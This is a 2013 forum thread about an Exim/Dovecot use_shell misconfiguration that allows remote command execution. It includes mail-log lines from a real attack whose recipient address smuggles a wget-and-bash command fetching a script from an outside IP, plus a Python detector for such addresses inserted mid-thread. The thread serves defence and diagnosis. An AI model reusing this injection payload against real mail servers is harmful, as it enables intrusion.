The Community Forums


Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution

Discussion in 'E-mail Discussions' started by Domenico, May 5, 2013.

  1. Domenico

    Domenico Well-Known Member

    #1 Domenico, May 5, 2013
    Last edited: May 5, 2013
  2. cPanelNick

    cPanelNick Administrator
    Staff Member

    We don't use use_shell in exim.conf. The deficiencies of use_shell are already documented in the exim documentation, showing this is a security problem when used this way. This is a case of blindly copying the example and not reading the docs that go along with it. It looks like the exim devs have since made the warning stronger and more fiercely worded.
     
  3. zye

    zye Well-Known Member

    I noticed
    <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com>

    exim_mainlog

    Code:
    2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 08:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 14:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 23:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 08:39:39 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 17:39:33 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 01:40:27 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 10:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (111): Connection refused
    
    exim_mainlog:2013-05-05 04:39:03 1UYgRb-0003y5-7t example.com [2001:500:88:200::10] Network is unreachable
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t example.com [192.0.43.10] Connection timed out
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.co
     
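A small detector for the pattern zye's log shows, added here as example code (not from cPanel, Exim or anyone in the thread): it scans exim_mainlog lines for address tokens carrying backticks, $(...), ${IFS}, ; or |, which a legitimate recipient never contains. The sample log lines in it are constructed, using a documentation IP and placeholder message ids rather than the real values above.

```python
import re

# Shell metacharacters that have no business in a mail address local part:
# backticks and $(...) run commands, ${IFS} is the usual space substitute
# (an address cannot contain a literal space), ; and | chain commands.
SHELL_META = re.compile(r'`|\$\(|\$\{\s*ifs\s*\}|[;|]', re.IGNORECASE)


def suspicious_addresses(line):
    """Return the distinct address-like tokens in one exim_mainlog line
    that contain shell metacharacters. Splitting on whitespace is safe
    because an injected address cannot contain spaces (hence ${IFS})."""
    seen = []
    for tok in line.split():
        tok = tok.strip("<>")
        if "@" in tok and SHELL_META.search(tok) and tok not in seen:
            seen.append(tok)
    return seen


def scan_mainlog(lines):
    """Return (message_id, address) pairs for every log line whose
    recipient looks like a shell injection attempt. Exim mainlog lines
    start with 'YYYY-MM-DD HH:MM:SS <message-id> ...'."""
    findings = []
    for line in lines:
        hits = suspicious_addresses(line)
        if not hits:
            continue
        fields = line.split()
        msg_id = fields[2] if len(fields) > 2 else "?"
        findings.extend((msg_id, addr) for addr in hits)
    return findings


# Constructed sample log lines modelled on the thread's entries; the IP,
# message ids and hosts are documentation/placeholder values, not real ones.
SAMPLE_LOG = [
    "2013-05-05 04:39:24 1AAAAA-000001-AA == red`wget${IFS}203.0.113.5/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com "
    "<red`wget${IFS}203.0.113.5/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> "
    "R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out",
    "2013-05-05 04:40:01 1AAAAB-000002-AB => alice@example.com R=dkim_lookuphost T=dkim_remote_smtp H=mail.example.com [192.0.2.10]",
    "2013-05-05 04:41:15 1AAAAC-000003-AC <= bob@example.org H=relay.example.org [192.0.2.20] P=esmtp S=1234 for carol@example.com",
]

if __name__ == "__main__":
    for msg_id, addr in scan_mainlog(SAMPLE_LOG):
        print(f"{msg_id}: {addr}")
```

Run it against a real exim_mainlog with `scan_mainlog(open("/var/log/exim_mainlog"))`; any hit is a message that should be frozen and inspected, and on a box that had use_shell set it is a sign to check /tmp and the crontabs as well.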
  4. cPanelNick

    cPanelNick Administrator
    Staff Member

    Looks like it's out in the wild now. From the log it looks quite unsuccessful.
     